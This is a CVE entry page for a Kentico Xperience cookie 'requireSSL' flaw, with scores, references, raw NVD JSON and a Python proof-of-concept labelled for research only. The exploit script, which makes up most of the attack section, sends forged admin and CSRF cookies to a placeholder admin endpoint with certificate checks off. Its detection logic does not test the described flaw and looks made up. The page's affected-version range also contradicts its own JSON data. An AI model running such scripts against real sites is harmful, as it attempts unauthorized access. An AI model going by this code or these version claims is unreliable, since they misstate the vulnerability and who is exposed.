CVE-2024-58317

Description

A cookie security configuration vulnerability in Kentico Xperience allows attackers to bypass SSL requirements when setting administration cookies via web.config. The vulnerability affects .NET Framework projects by incorrectly handling the 'requireSSL' attribute, potentially compromising session security and authentication state.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:* - VULNERABLE

Kentico Xperience < 13.0.235 (需确认)

Kentico Xperience .NET Framework版本 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import urllib3
urllib3.disable_warnings()

# CVE-2024-58317 PoC - Kentico Xperience Cookie Security Configuration Bypass
# Description: This PoC demonstrates the SSL requirement bypass in cookie configuration

target_url = "https://TARGET_URL/"  # Replace with target URL

def check_vulnerability():
    """
    Check if the target is vulnerable to CVE-2024-58317
    The vulnerability allows cookies to be set without proper SSL enforcement
    """
    print("[*] Testing for CVE-2024-58317: Kentico Xperience Cookie Security Bypass")
    
    # Step 1: Try to access the administration login page
    try:
        response = requests.get(target_url + "admin", verify=False, timeout=10)
        print(f"[*] Admin page status: {response.status_code}")
        
        # Step 2: Check for cookies without Secure flag via HTTP
        # This simulates the bypass condition
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) PoC-Tester',
            'Cookie': 'CMSPreferredCulture=en-US; CMSCsrfCookie=test'
        }
        
        # Step 3: Send request and analyze cookie attributes
        test_response = requests.get(target_url, headers=headers, verify=False, timeout=10)
        cookies = test_response.cookies
        
        print(f"[*] Received cookies: {len(cookies)}")
        for cookie_name, cookie_value in cookies.items():
            print(f"    - {cookie_name}: {cookie_value}")
        
        # Step 4: Check if cookies are set without Secure flag
        # Vulnerability exists if cookies can be set over HTTP or Secure flag is missing
        if 'CMSPreferredCulture' in cookies or 'CMSCsrfCookie' in cookies:
            print("[!] Potential vulnerability detected - Cookie configuration may be affected")
            return True
            
    except requests.RequestException as e:
        print(f"[!] Request failed: {e}")
        return False
    
    return False

def exploit_cookie_bypass():
    """
    Exploit the cookie security configuration bypass
    Attempts to set admin cookies without proper SSL validation
    """
    print("[*] Attempting cookie bypass exploit...")
    
    # Malicious cookie injection attempt
    malicious_cookies = {
        'CMSAdminCookie': 'malicious_session_id',
        'CMSCsrfCookie': 'csrf_token_bypass'
    }
    
    try:
        response = requests.get(
            target_url + "admin/cmssections/savesomething",
            cookies=malicious_cookies,
            verify=False,
            timeout=10
        )
        print(f"[*] Exploit response status: {response.status_code}")
        return response.status_code == 200 or response.status_code == 302
        
    except requests.RequestException as e:
        print(f"[!] Exploit failed: {e}")
        return False

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2024-58317 PoC - Kentico Xperience Cookie Security Bypass")
    print("=" * 60)
    
    if check_vulnerability():
        print("[+] Target appears to be vulnerable")
        if exploit_cookie_bypass():
            print("[!] Exploit successful - Cookie bypass confirmed")
    else:
        print("[-] Target does not appear to be vulnerable or is not reachable")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-58317
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-58317
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-58317/
[4] VulDB https://vuldb.com/cve/CVE-2024-58317
[5] https://devnet.kentico.com/download/hotfixes
[6] https://www.vulncheck.com/advisories/kentico-xperience-cookie-security-configuration

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-58317", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:53.473", "lastModified": "2025-12-24T16:38:56.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cookie security configuration vulnerability in Kentico Xperience allows attackers to bypass SSL requirements when setting administration cookies via web.config. The vulnerability affects .NET Framework projects by incorrectly handling the 'requireSSL' attribute, potentially compromising session security and authentication state."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-614"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.0.164", "matchCriteriaId": "F2B3010A-B713-41A0-83BC-5AFCA093BA9F"}]}]}], "references": [{"url": "https://devnet.kentico.com/download/hotfixes", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/kentico-xperience-cookie-security-configuration", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}